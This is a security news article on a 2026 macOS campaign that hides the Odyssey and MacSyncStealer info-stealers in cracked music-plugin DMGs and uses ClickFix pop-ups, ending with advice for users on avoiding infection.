The High Cost of Free: Cracked Music Plugins Weaponized to Infect macOS with Odyssey Malware
Ddos 
Clickfix browser populated pop-up
For many digital creators and music producers, the allure of high-end audio plugins can often lead to a search for “cracked” versions to save costs. However, a new investigation by security researchers at Iru reveals that this pursuit of free software is currently being weaponized in a massive, multi-stage malware campaign targeting macOS users.
The campaign, discovered on February 4, 2026, uses a sophisticated delivery pipeline to distribute a variety of info-stealers and backdoors, including the notorious Odyssey and MacSyncStealer malware.
The attack begins with social engineering, as threat actors distribute malicious Disk Image (DMG) files disguised as legitimate, professional music software.
“Threat actors utilize social engineering to deceive users into installing malicious DMG files disguised as cracked music plugins,” the Iru report explains. Even though these DMG files are unsigned—a major red flag for macOS security—the report notes that “the social engineering lure successfully convinces users to attempt to execute files manually”.
Once the user mounts the DMG and attempts the installation, a series of malicious artifacts are triggered, including a binary loader and a secondary bash script.
What makes this campaign particularly resilient is the use of a “ClickFix” style attack. “The malware attempts to run harmful scripts immediately when executed,” Iru researchers observed. Furthermore, it employs “a ‘ClickFix’ style attack via browser pop-up to trick users into manually copying and pasting malicious code, potentially re-infecting the system even after an initial compromise”.
By utilizing the victim’s own actions to paste code into a terminal or run dialog, the attackers effectively bypass modern browser download protections and gatekeeper warnings.
The technical sophistication of the delivery chain suggests this is not a one-off operation by a single hacker. Instead, researchers believe this is a professionalized “Loader as a Service”—a malware distribution platform sold to other cybercriminals.
The operation is deeply embedded in the “Pay-Per-Install” (PPI) ecosystem, where attackers earn a bounty for every device they successfully infect. By targeting the creative community with music plugins, the actors ensure a steady stream of high-value targets, often using machines with significant processing power and sensitive intellectual property.
Analysis of the secondary distributor scripts revealed a highly organized infrastructure. Deobfuscated code snippets showed the malware calling back to a command-and-control (C2) domain at kuturu.com using unique API keys and tokens to track the status of the infection.
“Within the DMG’s Installer directory, researchers identified two critical artifacts: a malicious mach-O binary and a bash script,” the report details, identifying them as the primary drivers for the ClickFix lures and the subsequent info-stealer payloads.
To protect your digital studio and personal data, security experts recommend:
- Avoid “Cracked” Software: Only download plugins and software from official developer websites or authorized retailers.
- Respect MacOS Warnings: If your system warns that an application is unsigned or from an unidentified developer, do not manually override the security block.
- Beware of Unusual Prompts: Never copy and paste code from a website into your terminal or a Run dialog, regardless of how “official” the verification prompt appears.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
